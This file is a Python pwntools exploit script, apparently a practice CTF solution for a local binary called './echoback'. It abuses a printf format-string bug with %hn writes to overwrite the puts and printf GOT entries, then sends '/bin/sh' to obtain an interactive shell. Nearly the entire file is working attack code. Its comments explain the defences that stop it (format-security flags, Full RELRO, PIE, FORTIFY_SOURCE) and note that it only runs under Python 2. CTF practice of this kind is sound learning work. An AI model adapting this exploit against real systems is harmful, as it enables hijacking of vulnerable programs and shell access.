exploit.py


from pwn import *


# Practice solution for the local CTF binary ./echoback: it uses a printf
# format-string bug (user input used as the format argument) to overwrite two
# GOT entries with %hn writes.
#
# Defender's view of what this script relies on:
#   * Root cause: input reaches printf as the format string. `printf("%s", buf)`
#     removes the bug; -Wformat-security flags this pattern at build time.
#   * The GOT must be writable. Full RELRO (-Wl,-z,relro,-z,now) makes it
#     read-only after startup, so these writes would fault.
#   * The hard-coded 0x0804.... values assume a fixed load address (non-PIE).
#   * glibc built with -D_FORTIFY_SOURCE=2 aborts on %n in a writable format
#     string.
#
# NOTE(review): p32() results are concatenated with str literals below. That
# only works where p32 returns str (Python 2 pwntools); on Python 3 it returns
# bytes and the `+=` raises TypeError.

# Start the target as a local child process.
p = process('./echoback')

# Parse the same file to look up GOT slot addresses by symbol name.
e = ELF('./echoback')


# Value written over the puts GOT slot, split into two 16-bit halves because
# each %hn stores only the low 16 bits of the running output count.
# Low half: 0x85ab.
vuln_low = 0x85ab

# High half is 0x0804, expressed as 0x10804: the output count can only grow, so
# it is pushed past 0x85ab up to 0x10804 and %hn truncates that to 0x0804.
# Resulting 32-bit value: 0x080485ab.
# NOTE(review): presumably an address inside the binary's vulnerable function,
# so the next puts call re-enters it - confirm against the disassembly.
vuln_high = 0x10804

# Value written over the printf GOT slot, same low/high scheme -> 0x08048460.
# NOTE(review): despite the "got" in the name this is used as a code pointer,
# presumably system's PLT stub - confirm with the binary's symbol table.
system_got_low = 0x8460

system_got_high = 0x10804

# Addresses of the GOT slots to be overwritten, read from the ELF.
puts_got = e.got['puts']

printf_got = e.got['printf']


# --- Stage 1: redirect puts ---
# The payload begins with the two destination pointers (slot, slot + 2), one
# per 16-bit half.
payload = p32(puts_got)

payload += p32(puts_got + 2)

# Pad the output so the running count equals vuln_low; the "- 8" accounts for
# the 8 pointer bytes already emitted above.
payload += '%{}x'.format(vuln_low - 8)

# Store the count's low 16 bits through positional argument 7.
# assumes arguments 7 and 8 are where the two pointers above land on the stack
# for this specific binary - TODO confirm.
payload += "%7$hn"

# Grow the count from vuln_low to vuln_high for the second half.
payload += '%{}x'.format(vuln_high - vuln_low)

# Store the (truncated) count through positional argument 8, i.e. slot + 2.
payload += "%8$hn"

# Wait for the first newline from the process, then send stage 1.
p.sendlineafter('\n', payload)


# --- Stage 2: redirect printf (same construction as stage 1) ---
payload2 = p32(printf_got)

payload2 += p32(printf_got+2)

payload2 += "%{}x".format(system_got_low-8)

payload2 += "%7$hn"

payload2 += '%{}x'.format(system_got_high - system_got_low)

payload2 += "%8$hn"


# The script expects the "message:" prompt again after stage 1 and answers it
# with stage 2.
p.sendlineafter("message:\n",payload2)

# Third prompt: the input is now a command string rather than a format string.
# NOTE(review): this relies on the program passing the input as the first
# argument of the call that goes through the rewritten printf slot - confirm.
p.sendlineafter("message:\n","/bin/sh\x00")

# Hand the process's stdin/stdout over to the terminal.
p.interactive()
